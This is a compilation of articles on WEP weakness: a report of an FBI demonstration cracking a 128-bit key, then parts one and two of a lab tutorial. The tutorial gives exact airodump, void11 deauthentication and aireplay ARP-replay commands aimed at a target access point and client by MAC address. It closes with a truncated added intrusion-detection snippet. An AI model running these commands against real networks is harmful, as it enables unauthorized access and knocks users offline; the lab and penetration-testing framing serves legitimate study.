Some vendors continue to sell products that completely lack reasonable wireless security features. In just two months since the publication of part one of this article, I've encountered multiple brand new devices, including Wi-Fi VOIP phones and an access point provided by a cable Internet provider, that provide no encryption capability other than WEP. As long as this continues, white hats and black hats alike will keep improving the attack techniques that render WEP even worse than useless. For the most part, the newer WEP attack tools exploit vulnerabilities that were described in theory four or more years ago. Perhaps people will learn from the history of WEP the lesson that theoretical vulnerabilities will become real vulnerabilities. Until they do, you can use these penetration testing tools to assess the weaknesses of your own network and maybe even convince someone that change is needed.

Tools and links


[1] Auditor Security Collection: http://remote-exploit.org/?page=auditor
[2] Ethereal: http://www.ethereal.com/
[3] aircrack: http://www.cr0.net:8040/code/network/aircrack/
[4] WepLab: http://weplab.sourceforge.net/
[5] WEPWedgie: http://sourceforge.net/projects/wepwedgie/
[6] Linksys recommends shared key authentication: http://www.linksys.com/splash/wirelessnotes.asp
[7] AirJack: http://sourceforge.net/projects/airjack/
[8] Wi-Fi Dog of War Mini How-To: http://www.geekspeed.net/~beetle/download/wifi_dog.html
[9] chopchop: http://www.netstumbler.org/showthread.php?t=12489

The Feds Can Own Your WLAN Too


Introduction
Millions of wireless access points are spread across the US and the world. About 70 percent of these access points are unprotected - wide open to access by anyone who happens to drive by. The other 30 percent are protected by WEP (Wired Equivalent Privacy) and a small handful are protected by the new WPA (Wi-Fi Protected Access) standard. At a recent ISSA (Information Systems Security Association) meeting in Los Angeles, a team of FBI agents demonstrated current WEP-cracking techniques and broke a 128 bit WEP key in about three minutes. Special Agent Geo Bickers ran the Powerpoint presentation and explained the attack, while the other agents (who did not want to be named or photographed) did the dirty work of sniffing wireless traffic and breaking the WEP keys. This article will be a general overview of the procedures used by the FBI team. A future article will give step-by-step instructions on how to replicate the attack.

WEP Cracking - The Next Generation


WEP is an encryption scheme, based on the RC4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter, and the scrambled message is then decrypted by the receiver. Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV) is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104. The IV is placed in the encrypted frame's header and is transmitted in plain text. Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets - a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key. Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!"

On with the Show


Before we get into the steps that the FBI used to break WEP, it should be noted that there are numerous ways of hacking into a wireless network. The FBI team used publicly available tools and emphasized that they are demonstrating an attack that many other people are capable of performing. On the other hand, breaking the WEP key may not necessarily give an attacker complete access to a wireless network. There could also be other protection mechanisms such as VPNs or proxy servers to deal with. For the demonstration, Special Agent Bickers brought in a NETGEAR wireless access point and assigned it an SSID of NETGEARWEP. He encrypted the access point with a 128 bit key - made by just keying in random letters and numbers. Note that normally, you have to find wireless networks before you can crack them. The two wireless scanning tools of choice are Netstumbler for Windows and Kismet for Linux. Since the other WEP cracking tools are mainly Linux-based, most people find it easier to stick with Kismet so they don't have to switch between Windows and Linux.

Figure 2: Scanning for Networks

Another FBI agent started Kismet and immediately found the NETGEARWEP access point. Just for fun, a third agent used his laptop and ran FakeAP, a program that confuses scanning programs by putting up fake access points.

Attack!
After a target WLAN is found, the next step is to start capturing packets and convert them into pcap (short for packet capture) format. These pcap files will then be processed by other programs. Many programs, both commercial and open source, can be used to capture packets, but the two favorites seem to be Kismet and Airodump (now part of Aircrack). Ideally, one laptop should be scanning while another laptop runs the attack - which is what the FBI team did. About half a dozen different software tools were then used by the FBI team, and they are listed - along with their download links - at the end of the article. Thankfully, the Auditor's Security Collection, which we reviewed last year, is a live CD that has all of these tools already installed. Even the FBI likes this distribution.

Figure 3: Capturing Packets

If a hacker is lucky enough to find an extremely busy wireless network, passive sniffing should provide enough good packets to allow the WEP key to be recovered. In most cases, however, an active attack or series of attacks is needed to jump-start the process and produce more packets. Note that active attacks generate wireless traffic that can itself be detected and possibly alert the target of the attack.

The FBI team used the deauth feature of void11 to repeatedly disassociate the laptop from the access point. The desired additional traffic was then generated as Windows XP tried to re-associate with the AP. Note that this is not a particularly stealthy attack, as the laptop user will notice a series of "Wireless Network unavailable" notifications in the taskbar of their desktop screen.

Another attack method the FBI team used is a replay attack. The basic premise of this attack is to capture at least one packet traveling from the victim laptop to the victim access point. This packet can then be replayed into the network, causing the target AP to respond and provide more traffic to capture. Aireplay (also part of Aircrack) can perform a replay attack based on captured ARP (Address Resolution Protocol) packets, which are broadcast at regular intervals in wired and wireless networks and are easy to spot. Aireplay automatically scans a captured pcap file, pulls out the suspected ARP requests, and replays them to the access point.

After about three minutes of capturing and cracking, the FBI team found the correct WEP key and displayed it on a projected notebook screen. Agent Bickers, still speaking to the audience, turned around, looked at the screen and was surprised: "Usually it takes five to ten minutes."

Figure 4: Gotcha!

Countermeasures & Conclusion


So what can you do to prevent hackers from getting into your network? Special Agent Bickers and his team have some tips for wireless users. He stresses that these are mainly for home users and should not be considered as official FBI best practices for businesses.

1) Network segregation - Put your access point on a separate subnet, with a firewall separating the wireless and internal users.

2) Change the default settings on your access point - Default settings (SSID, administrator password, channel) are well known and even included as part of some WLAN attack tools.

3) Use WPA with a strong key - WPA is a definite improvement over WEP in providing wireless security. But the version intended for home and SOHO use - WPA-PSK - has a weakness shared by any passphrase security mechanism. The choice of simple, common and short passphrases may allow your WPA-protected WLAN to be quickly compromised via dictionary attack (more info here).

4) Update your firmware - This is helpful if your AP or client doesn't currently support WPA. Many manufacturers have newer firmware for 802.11g products that add WPA support. You may also find this for 802.11b gear, but it's not as common. Check anyway!

5) Turn off the WLAN when not in use - A $5 lamp timer from your local hardware store is a simple, but effective way to keep your WLAN or LAN from harm while you're sleeping.

Bickers also said that if you have an access point that can swap keys fast enough, you may be able to stay ahead of an attacker. "Most likely they will get bored and attack someone else." But for most WLAN owners, this method isn't practical. The FBI demonstrated this attack to the computer security professionals at the ISSA meeting in order to show the inadequate protection offered by WEP. It is one thing to read stories of WEP being broken in minutes, but it is shocking to see the attack done right before your eyes. It was fast and simple.

To Explore Further
Tools Used

Auditor's Security Collection - Contains all the wireless hacking tools already installed
Kismet
Airsnort
Aircrack (includes Aireplay and Airodump)
void11

Cracking WEP: Step by Step


Part 1: Setup & Network Recon
Introduction
Hundreds, perhaps thousands of articles have been written about the vulnerability of WEP (Wired Equivalent Privacy), but how many people can actually break WEP encryption? Beginners to WEP cracking have often been frustrated by the many wireless cards available and their distribution-specific commands. And things are further complicated when the beginner is not familiar with Linux. In this three-part series, we will give you a step by step approach to breaking a WEP key. The approach taken will be to standardize as many variables as possible so that you can concentrate on the mechanics of WEP cracking without being hindered by hardware and software bugs. The entire attack is done with publicly available software and doesn't require special hardware - just a few laptops and wireless cards.

Figure 1: Gotcha!

This first article will help you set up your wireless lab and guide you through the scanning portion of WEP cracking. After all, you will need to find and document the wireless networks before you can crack them. The second article will describe the stimulation of the target WLAN to generate traffic and the actual process of capturing data and cracking the WEP key. After reading these two articles, you should be able to break WEP keys in a matter of minutes. A third article will turn things around and describe how to defend against multiple skill levels of wireless intruders.

NOTES:

A description of the basic approach and techniques used in this How To can be found in The Feds can own your WLAN too. You don't need to be a networking expert to successfully follow this How To, but you need basic familiarity with networking terminology and principles. You should know how to ping, open a Windows Command Prompt, enter command lines and know your way around the Windows networking properties screens.

What you Need


Although WEP cracking can be done from a single laptop, ideally you should have two. One laptop performs an active attack to stimulate data flow so that a sufficient number of packets can be captured in a relatively short amount of time, while the other laptop "sniffs" or captures the traffic produced by the attacking laptop. Figure 2 shows the basic idea.

You can actually run a WEP crack using one notebook equipped with a single wireless LAN card, but we don't recommend this configuration as a starting point. With only one notebook, it's easy to get confused about what you're doing, and we've found that the Auditor programs can get a bit unstable when used in this way.

Figure 2: Two Notebook WEP cracking setup

Note that using an active attack vs. passively capturing traffic increases your chances of detection. But it can significantly speed a WEP key crack by forcing the generation of more packets than you would normally capture in a short time from a lightly-used WLAN.

Tip: Although we refer to laptops / notebooks throughout this series, you can also use desktop computers or a mixture of laptops and desktops. However, you may find using notebooks easier due to their portability and the wider range of compatible PC Card wireless adapters available.

Here is a list of required hardware:

Wireless Access Point - This will be the "target" access point and can be any brand. We used a Netgear WGT624 v2.
A laptop or computer with wireless capability - This will be the "target" computer, and it doesn't matter which wireless chipset or card the computer uses. Our lab had a surplus Dell laptop with built-in wireless that worked just fine.
Two 802.11b PC Cards based on the PRISM 2 chipset - Some of the programs (such as Kismet) we use in this series can support a wide variety of wireless cards. But we suggest you stick to using cards based on the PRISM 2 chipset, which are supported by all the programs we will use. We used two 2511CD PLUS EXT2 cards. The 2511-CD PLUS EXT2 has two MMCX connectors for external antennas and does not have an internal antenna. These cards are typically found under the Senao, Engenius or Wireless LAN brand names (Figure 3). You can also search this list compiled by Absolute Value Systems to find other PRISM 2-based cards.

If you purchase a wireless card that has an external antenna connector, you may want to buy an antenna and appropriate "pigtail". (The pigtail is a short cable that connects the end of the antenna cable to your Wi-Fi card.) This isn't always necessary since some cards with external antenna connectors also have internal antennas. But note that the 2511CD PLUS EXT2 series of cards do not have an internal antenna, so you must purchase an antenna if you're using that card. You are welcome to use any type of external antenna you want (or none at all), but we purchased the Mobile Patch antenna pictured in Figure 4. The suction cup bottom of the patch antenna makes it wonderful for wardriving, as you can temporarily attach it to your car windows.

Figure 4: Mobile Patch Antenna

This antenna has 8dBi of gain and, like many antennas, has a short cable that terminates in an N-Female connector. For the Senao / Engenius cards, you will need to buy a pigtail with an MMCX connector on one end. The connector is about 1 mm in diameter, with a very small pin in the middle.

Figure 5: MMCX connector on pigtail cable

As a side note, pigtail connectors are disliked by many people. It's an extra cable to carry around, and sometimes the connector breaks off. In addition, it is a pain to disconnect the pigtail from the Wi-Fi card, as it takes a decent amount of force to pull the connector off.

The Software
While cracking WEP requires several open source tools, all of these tools are thankfully pre-installed on the free Auditor Security Collection LIVE CD. The CD boots a modified Kanotix Linux distribution into RAM (it doesn't touch your hard-drive) and auto-detects and configures many wireless cards. The current version of Auditor as of 12/16/2006 is auditor-200605-02 and can be downloaded as a CD Image or .ISO file. Note that there are two versions: one for systems with Intel B/G wireless cards (IPW2200) and the other for all other systems. Since this procedure is based on using a card with a PRISM 2 chipset, you'll need to download the other file. This image can be burned to a CD with any CD-burning software such as Nero (commercial) or CDBurnerXP (free). You will need to burn one CD for each of your scanning and attacking notebooks. Please donate a few bucks to the author if you find Auditor useful!

Lab Setup - Preparing the Target WLAN


Proper set up of your lab is important, because you want a controlled environment to practice in. You will also want to prevent collateral damage to neighboring APs that are not yours because some of the attacks described in Part 2 will forcibly knock clients off an AP. This could possibly wreak havoc with other wireless users in the area. So if you are in an office complex, apartment building or any other area with many wireless networks, it may be prudent to wait until night hours when the networks are less busy. Please practice safely and responsibly! The first step is to connect and configure a "target" wireless LAN comprised of an Access Point or wireless router and a single wireless client. This WLAN will be secured with the WEP key that you will be cracking. Give your AP an SSID of your choosing - we called ours "starbucks". Configure a 64 bit WEP key on the WAP to start - after you successfully break a 64 bit key, you can try a 128 bit key. You'll need to record the following information for later use:

MAC Address of the AP - This is usually displayed in the web configuration menu. It also may be found on a label on the bottom or side of the AP
SSID of the AP
Wireless channel of the AP - by default this will probably be Channel 6, but make sure
WEP key - If your AP displays the key as 0xFFFFFFFFFF (replace the F's with whatever your key is), write down only everything past the 0x

With the AP configured, we now need to get a client associated with it. (The following example uses Windows XP.) Right-click on the My Network Places icon on your desktop, or in your Start Menu. Then left-click Properties. Double-click the entry called Wireless Network Connection and a window similar to Figure 6 will open. Figure 6 shows that multiple WLANs are available, but your window may show only the "starbucks" AP that you just configured. Connect to your AP by double-clicking the corresponding SSID.

Figure 6: Connecting to your WAP

Because the AP has WEP enabled, Windows will ask for the network key in order to connect (Figure 7). Type in your WEP key (or cut and paste it from a Notepad or Wordpad document) and after a short wait Windows should report that you are connected to the network. Make sure that you are really connected by pinging a known computer on your wired LAN or opening your browser and checking your favorite website if your WLAN is connected to the Internet.

Figure 7: Entering WEP Key

If you can't get a successful ping or browse the web, open your wireless adapter's Network properties, click on the Support tab and check that you have valid IP address information. If you don't, check that your LAN's DHCP server is enabled and also check that the wireless adapter's TCP/IP properties are set to "Obtain an IP address automatically". You may also need to run a Repair on the connection.

Lab Setup - AP
Once you are successfully connected, record the MAC Address of target computer. You can do this by opening a command prompt window and entering the ipconfig /all command. You should get a screen similar to Figure 8, in which I've highlighted the wireless network adapter MAC address information.

Figure 8: Type in ipconfig /all to find the MAC Address

Since your client machine is running Windows XP, you can also get the MAC address from the Wireless Connection Status window. Click on the Support tab, then the Details button and the MAC address is right at the top (Figure 9), but of course called something different, i.e. "Physical Address".

Figure 9: MAC address in Network Connection Details

You will notice that in Windows, the MAC address numbers and letters are separated by dashes. The dashes make the characters more readable, but the actual MAC address doesn't have dashes. At this point, our target WLAN is configured and working, so shut down the target client.

Lab Setup - Preparing the Notebooks


Now that the target computer has been set up, it's time to set up the notebooks that will scan for target WLANs and sniff traffic and run attacks to stimulate network traffic. First set your notebook to boot from its CD drive. It may be set this way by default, or you may have to change the boot order by changing BIOS settings. Next, shut down the notebook, insert a wireless card and Auditor Security Collection CD into the notebook and turn it on. After you pick the appropriate screen resolution from the Auditor boot menu, it will install to RAM and you will be presented with the Auditor start screen (Figure 10).

Figure 10: Auditor start screen

The two most important icons will be the Programs and Command Line icons, which are located at the bottom left side of the screen (Figure 11).

Figure 11: Programs and Command Line locations

Before you do anything else, you must make sure that your wireless network card has been recognized and configured by Auditor. Click on the command line icon to open a command line window, then type iwconfig. Among the other information that Auditor spews out, you should see wlan0, which is the designation that Auditor gives to PRISM-based cards. If your screen looks similar to Figure 12, then Auditor has correctly detected your wireless card. You can now close out of the command line screen.

Figure 12: iwconfig to verify that the wireless card works

Repeat these same steps for your second notebook, then shut it down. You won't be needing it until Part 2, where you'll learn how to use it to stimulate WLAN traffic that will be captured by your first notebook.

Network Recon with Kismet


You're now ready to start Kismet, which is a Linux-based wireless scanner. It's a handy tool for surveying the wireless airwaves around you to find target wireless LANs to crack. Kismet also captures traffic, but there are other tools such as airodump (part of Aircrack) that do a better job in the context of cracking WEP. So we'll be using it to make sure our wireless card is working and for scanning for wireless networks. Then we will switch to different tools in Part 2 to actually sniff and capture traffic. You get to Kismet by clicking on the Programs icon, then Auditor, then Wireless, then Scanner/Analyzer, and finally Kismet (Figure 13).

Figure 13: Getting to Kismet

In addition to scanning wireless networks, Kismet captures packets into a file for later analysis. So Kismet will ask for the directory to save the captured files in. Click Desktop and then OK (Figure 14).

Figure 14: Specifying the Save Location

Kismet will then ask for a prefix for the captured files (Figure 15). Change the default name to capture and then click OK.

Figure 15: Specifying the file prefix

As Kismet starts, it will display all the wireless networks in range (Figure 16), which should hopefully include the target WLAN you set up. The channel number, under the Ch column, should match what you have written down. If Kismet has found many nearby access points, you may want to move the lab farther away from the Access Points, or disconnect any high-gain antennas you have connected.

Figure 16: Kismet at work

While Kismet is jumping through all the channels and SSIDs looking for interesting information, you will see the number of packets changing for all the access points. In the column at the right side of the screen, Kismet displays the total number of networks found, the number of packets captured and the number of encrypted packets seen. Even with the target computer off, Kismet is detecting packets from our AP. This is because APs send out "beacons", which tell wireless computers that an AP is in range. You can think of it as the AP announcing, "My name is XXXXX, please connect to me." Kismet starts in "autofit" mode, which doesn't list APs in any meaningful order. Press "s" to get to the Sort menu (Figure 17). Here you can specify sort orders, which will organize the APs better.

Figure 17: Sort options in Kismet

Press "c" and the access points will be ordered by channel. (Figure 18)

Figure 18: Sorting WAPs by channel

Kismet will by default hop through channels 1 to 11. Use the cursor keys to move the highlight bar to your SSID and press "L" (note capital "L") and Kismet will lock on the SSID's channel (Figure 19). You will notice that the packet numbers of other APs may still continue to increase. This is because many channels overlap each other in frequency.

Figure 19: Locking the channel scanning in Kismet

Now that we are reasonably sure that Kismet is working, let's see what happens when the target computer on the network starts transmitting information. In most cases, this will be receiving / sending of email or web surfing. Start the target computer, while keeping the scanning laptop in Kismet. As the target computer boots into Windows and connects to the target AP, you will notice a surge in regular and encrypted packets being captured by Kismet. You'll be using these packets in the attacks described in Part 2 of this series.

Conclusion
At this point, you know the basic approach to WEP cracking, have a target WLAN configured and have both sniffing and attack computers configured and working. You also have gained a basic familiarity with Auditor and used Kismet to find in-range wireless LANs. In Part 2, we will use the second notebook to stimulate the target LAN to generate wireless traffic that we will capture and perform the actual WEP key crack. Until then, you can familiarize yourself with Kismet, go WLAN hunting and explore some of the other tools on the Auditor CD.

To Explore Further
Tools Used

Auditor's Security Collection - Contains all the wireless hacking tools already installed
Kismet
July 1st, 2004 - Auditor Review (not current version)

Related Articles

Part 2: Performing the Crack


Introduction
In Part 1 of How to Crack WEP, we showed the basic approach to WEP cracking, configured a practice target WLAN and configured both sniffing and attack computers. We also introduced the Auditor Security Collection and used Kismet to find in-range wireless LANs. In this article, we will describe how to use additional tools found on the Auditor CD to capture traffic and use it to crack a WEP key. We'll also describe how to use deauthentication and packet replay attacks to stimulate the generation of wireless traffic that is a key element of reducing the time it takes to perform a WEP key crack. Before we get started, however, let us make a few points that may save some readers the time and effort of trying these techniques:

To successfully follow this How To, you need basic familiarity with networking terminology and principles. You should know how to ping, open a Windows Command Prompt, enter command lines and know your way around the Windows networking properties screens. Basic familiarity with Linux will be helpful too.
These procedures assume the use of the specific wireless hardware described in Part 1. They will not work with other hardware types without modification.
These procedures assume that the target WLAN has at least one client associated with an AP or wireless router. They will not work with an AP that has no associated clients.
This tutorial is based on the Auditor version released April 2005. Future versions could make this attack easier or harder. In addition, some of the commands shown are Auditor-specific scripts that don't exist (but can easily be made) in other Linux distributions.
Accessing anyone else's network other than your own without the network owner's consent is illegal. SmallNetBuilder, Pudai, LLC and the author do not condone or approve of illegal use of this tutorial in any way.

Also note that it is possible to perform WEP cracking using only one computer. But we have chosen to use two to more clearly illustrate the process and avoid some of the complications caused by using a single computer. The four main tools used in this article are airodump, void11, aireplay and aircrack, which are included on the Auditor Security Collection CD:

Airodump scans the wireless network for packets and captures these packets into files
Void11 will deauthenticate computers from a wireless access point, which will force them to reassociate to the AP, creating an ARP request
Aireplay takes this ARP request and resends it to the AP, spoofing the ARP request from the valid wireless client
Finally, aircrack will take the capture files generated by airodump and extract the WEP key

From your scanning with Kismet as described in Part 1, you should have written down the following four pieces of information:

MAC Address of the wireless Access Point (AP)
MAC Address of the "Target" computer
WEP key used
Wi-Fi channel used

In the following procedures, we will call our laptops Auditor-A and Auditor-B and call the target computer Target. Let's get started.

Starting from scratch


In real life, someone trying to break into a wireless network usually would have to obtain the information needed (MAC address of the AP and Target PC and wireless channel). Professionals who do penetration testing of networks describe this attack as a "Zero Knowledge" attack, for obvious reasons. If the attacker already has all the information needed, that's called a "Full Knowledge" attack, which is nowhere near as challenging! We'll assume that we know nothing and describe how to get the information we need.

Finding the MAC Address of the AP with Kismet

Figure 1: Navigating Kismet

Finding the MAC Address of the AP is extremely easy with either Kismet or Netstumbler. Start Auditor-A with its Wi-Fi card and Auditor CD inserted. Once Auditor is up, start Kismet, just like you did in Part 1, and you will see a list of APs. Type s and then c to sort the APs by channel and, using the arrow keys, move the highlight bar to your target AP's SSID. Then hit the Enter key. This will bring up a detailed screen (Figure 2) that will show the selected AP's SSID, MAC address and channel. Voila! "Zero knowledge" has been transformed into almost all the information needed to run a WEP crack.

Figure 2: Kismet easily finds the SSID, Channel and MAC address

Tip: Some "security professionals" suggest cloaking your SSID / disabling SSID broadcasts. While this will defeat a Netstumbler scan, Kismet will easily detect "cloaked" SSIDs. Kismet captures more network information than Netstumbler and can find AP SSID's by following conversations between associated clients and the AP.

Finding the MAC Address of the Client


We need one last piece of information to begin our cracking - the MAC address of a wireless client associated to the AP of our Target WLAN. Go back to Kismet and type q to quit out of the details menu. The highlight bar should still be on your AP, if it isn't, then use the arrow keys again. Typing shift-C will bring up a list of clients. The MAC addresses are listed on the left side (Figure 3).

Figure 3: Client MAC address found by Kismet

If you don't see the MAC address of the TARGET computer, check to make sure it's on and associated with the Target AP (boot the TARGET into Windows, have it connect to the AP and start browsing the web). In about 10-30 seconds, you should see the MAC address of the TARGET computer pop up in Kismet. A prudent cracker would probably record all the client MAC addresses found so as not to be thwarted if a client isn't present when the time comes to start the cracking process.

Packet capture with Airodump

Figure 4: Airodump usage

As amazingly fast as aircrack is, it still needs a sufficient number of "interesting" packets to work on in order to crack a WEP key. As we noted earlier, packet capture is done by airodump, which creates a file of captured data for aircrack. Let's see how it's done. You can use either computer, but we'll stick with Auditor-A. Open the shell and type in the following commands:

Commands for setting up airodump
iwconfig wlan0 mode monitor
iwconfig wlan0 channel THECHANNELNUM
cd /ramdisk
airodump wlan0 cap

NOTES:
- Replace THECHANNELNUM with the channel number of your Target WLAN
- The /ramdisk directory is where the capture data will be stored

If there are many wireless access points close by, you may want to attach the MAC address of your target AP to the end of the airodump command like so:
airodump wlan0 cap1 MACADDRESSOFAP

This will instruct airodump to write only the packets of the target AP to the capture file. You can exit out of Airodump by typing Control-C. Typing ls -l will list the contents of the directory. Notice the size of the capture file, which has the extension .cap. If packets were successfully captured, the file size should be a few kB or so after a few seconds of capture. Note that if Airodump is stopped and restarted with the same parameters, the new capture file will be appended to the previous one. You may want to make separate files by naming the first file cap1, the next cap2 and so on.

Collecting IVs with Airodump

Figure 5: Watch the IV count go up

While airodump is running, you should see the MAC address of your AP listed under BSSID on the left side of the window. You should also see the Packet count and IV (Initialization Vector) count going up. This is due to normal Windows network traffic that is generated even if you aren't surfing the web or checking your email. So you will see the IV count rise by a few IVs after a while. If you start surfing the web on the TARGET computer, you should see that each new webpage raises the IV count in airodump. We aren't interested in the Packet count, because it doesn't help us with WEP cracking and many of the packets will be beacons coming from the AP. (Most APs send out ten beacons a second by default, and you will see that reflected in the packet count in airodump.) The IV count is the important number to watch for, since you will need to capture around 50,000 to 200,000 IVs in order to crack a 64 bit WEP key, and for a 128 bit key you will need around 200,000 to 700,000 IVs!

Deauthentication via void11


You probably noticed that the IV count doesn't rise very quickly under normal traffic conditions. In fact, it could take several hours or even days, to capture enough data from most wireless LANs for a successful WEP key crack under normal conditions. But fortunately, there are a few tools at our disposal to speed things along. The easiest way to speed up packet generation is for the Target WLAN to be a busy one. We can simulate this by running a continuous ping or starting a large file download on the Target. Keep airodump running on Auditor-A and notice the rate that the IV count is rising. Then start your file download via bittorrent or just download an .ISO file of your favorite Linux distribution or movie trailer. Alternatively, a continuous ping can be done in Windows by entering the following into a command window:
ping -t -l 50000 ADDRESS_OF_ANOTHER_LAN_CLIENT

where ADDRESS_OF_ANOTHER_LAN_CLIENT is replaced by the IP address of the AP, router or any other pingable client on the LAN. Either of these methods will cause the IV count to rise a bit faster. But since they require access to the very WLAN that you are trying to obtain the WEP key for, they're useful only to illustrate that more traffic = more IVs. What is needed is a traffic-generation method that requires only the information that we've obtained via Kismet. This is where void11 comes in. Void11 is used to force a de-authentication of wireless clients from their associated AP, i.e. the clients are "kicked off" the AP. After being kicked off the wireless network, a wireless client will automatically try to reassociate with the AP. In the process of re-association, data traffic will be generated. This process is commonly referred to as a de-authentication or deauth attack. Here's how it's done.

Figure 6: void11 usage

Start Auditor-B with its Wi-Fi card and Auditor CD inserted. Once Auditor is up, open a shell and type in the following commands:

Commands for setting up a void11 deauth attack

switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel THECHANNELNUM
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s MACOFSTATION -B MACOFAP wlan0

NOTE: Replace THECHANNELNUM with the channel number of your Target WLAN, and MACOFSTATION and MACOFAP with the MAC addresses of the Target WLAN client and AP respectively, i.e.
void11_penetration -D -s 00:90:4b:c0:c4:7f -B 00:c0:49:bf:14:29 wlan0

Tip: You may see an invalid argument error while running void11 on the Auditor Security Collection. Don't worry about this error, as void11 is working, which we'll verify next.

Verifying the deauth


While void11 is running on Auditor-B, let's look at what's happening on the Target client. Normally, anyone using a Target client will be happily surfing websites or checking email, when suddenly the network will get very slow and eventually come to a halt. A few seconds later, the Target will be completely disconnected from the network. You can check this out for yourself by running a continuous ping from TARGET to the wireless access point. Figures 7 and 8 show a ping before and during a void11 deauth attack.

Figure 7: Successful pings before void11

Figure 8 shows that the pings will time out while void11 is running. If you do a Control-C on Auditor-B to stop the void11 attack, the pings will come back to life after a few seconds.

Figure 8: Pings die after void11 is started

You can see if you are being deauthenticated from an AP by looking at your wireless client's utility program, which usually indicates the connection status. Figures 9 and 10 show the wireless client utility built into Windows XP. Before the void11 attack starts, everything will seem normal, and Windows will show that you are connected to the AP (Figure 9).

Figure 9: Now you are connected

After void11 starts, the network status will change from connected to disconnected (Figure 10). After void11 is stopped on Auditor-B, the Target will reconnect back to the AP in a few seconds or so.

Figure 10: Now you aren't!

If you look back at Auditor-A - which we last left running airodump - while void11 is running, the IV count in airodump should increase to around 100-200 within a few seconds. This is due to the traffic generated by the Target client as it repeatedly tries to reassociate with its AP.

Packet replay via Aireplay


While a deauth attack generates traffic, it generally doesn't generate enough to effectively speed up our IV gathering process. It's also a pretty blunt instrument and severely interferes with normal WLAN operations. For more efficient traffic generation, we'll need to employ a different technique called a replay attack. A replay attack simply captures a valid packet generated by a Target client, then spoofs the client that it captured the packet from and replays the packet over and over again more frequently than normal. Since the traffic looks like it is coming from a valid client, it doesn't interfere with normal network operations and goes about its IV-generating duties quietly. So what we need is to capture a packet that is sure to be generated by the void11 deauth attack, stop the deauth attack, then start a replay attack using the captured packet. Perfect candidates for capture are Address Resolution Protocol (ARP) packets, since they're small (68 Bytes long), have a fixed and easily recognizable format, and are part of every reassociation attempt.

Figure 11: aireplay setup

Let's start with a clean slate and reboot both Auditor-A and Auditor-B. Figure 12 shows the roles that Auditor-A and Auditor-B are playing. Notice that Auditor-A is running only aireplay and is just serving to stimulate traffic (and IVs) to shorten the time it takes to crack a WEP key. Also notice that Auditor-B is used for either running the deauth attack (via void11) or capturing traffic (via airodump) and running the actual crack against the captured data via aircrack which we'll get to shortly.

Figure 12: The full WEP-cracking monty

We'll first start aireplay. Go to Auditor-A, open a shell and type in these commands:

Commands to set up aireplay to listen for an ARP packet

switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 THECHANNELNUM
cd /ramdisk
aireplay -i wlan0 -b MACADDRESSOFAP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

NOTES:
- switch-to-wlanng and monitor.wlan are custom scripts that come installed on the Auditor CD to simplify commands and reduce typing
- Replace THECHANNELNUM with the channel number of your Target WLAN

At first, nothing too exciting will happen. You should see aireplay reporting it has seen a certain number of packets, but little else, since the packets haven't matched the filter we've set (68 Byte packet with a destination MAC address of FF:FF:FF:FF:FF:FF). Now go to the Target client computer and open its wireless utility so that you can monitor its connection status. Then go to Auditor-B and start a void11 deauth attack by following the previous instructions. Once you've started void11, you should see the Target client lose contact with the Target AP. You should also see the packet rate reported by aireplay increase. At some point, aireplay will display a captured packet and ask if you want to replay it (Figure 13).

Figure 13: aireplay bags a packet

You want a packet that matches the following criteria (also illustrated in Figure 13):

FromDS - 0
ToDS - 1
BSSID - MAC Address of the Target AP
Source MAC - MAC Address of the Target computer
Destination MAC - FF:FF:FF:FF:FF:FF

Type n (for no) if the packet does not match these criteria and aireplay will resume capture. When aireplay successfully finds a packet matching the above criteria, answer y (for yes) to the replay question and aireplay will switch from capture to replay mode and start the replay attack. Immediately go back to Auditor-B and stop the void11 deauth attack.

Tips:
- The capture of a packet via a deauth attack can be the trickiest part of the WEP cracking process. While the deauth attack generates traffic, it generally doesn't generate very much because of the time it takes for a client to realize that it has lost connection with its AP and then more time for the re-association process to complete.
- Capture can be further complicated by the fact that the timing of these processes is different among client drivers (and operating systems). void11 can easily overwhelm a client with deauth packets so that it doesn't even have time to complete a re-association and generate the packets we'll be looking to capture.
- Sometimes you may luck out with the first packet captured. But other times you may have to wait for multiple captures.
- If aireplay doesn't produce a captured packet within a few thousand packets, void11 could be overwhelming the AP and client and not giving them any time to complete a reassociation. Try stopping void11 manually (control-C) and then restarting it. You can also try adding the -d parameter to the void11 command line (the delay value is in microseconds) and experimenting with different values to allow time for a successful reassociation. Be aware that some wireless clients lock up when subjected to a deauth attack and may need to be rebooted to recover!
- You may have difficulty capturing ARP packets via a deauth attack if the Target client is idle. This is unlikely to happen with a real Target WLAN, but could be a problem with your practice Target WLAN. If aireplay is not flagging packets for you to approve, you may need to go to your Target client and run a continuous ping or start a download before you start the deauth attack.
- As a final tip, if you absolutely cannot get void11 to work, you can test if aireplay is really working by cheating a little bit. Keep aireplay running on AUDITOR-A and turn off void11 on AUDITOR-B. Go to the TARGET computer and manually disconnect from the wireless network. You can do this through either the wireless connection properties or by simply turning the computer off. Now reconnect the computer or turn the computer back on. Within thirty seconds, aireplay on AUDITOR-A should see an ARP packet sent by the TARGET computer as it reconnects to the WLAN and requests an IP address.
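The two traffic patterns this section relies on, a burst of deauthentication frames and one encrypted frame repeated far more often than any client would send it, are exactly what a wireless intrusion detection sensor keys on. The following is an added example, not code from the article or from the Auditor tools, that parses raw 802.11 frames and flags both patterns. The sample capture is constructed inline (the MAC addresses reuse the article's own example values), and the window size and thresholds are assumptions a real deployment would tune.

```python
# Added example (not code from the original article): a minimal wireless IDS
# check that recognizes a deauthentication flood and a replayed WEP frame.
# Frames are parsed from raw 802.11 bytes; the capture below is constructed,
# and the thresholds are assumptions.
from collections import Counter, defaultdict

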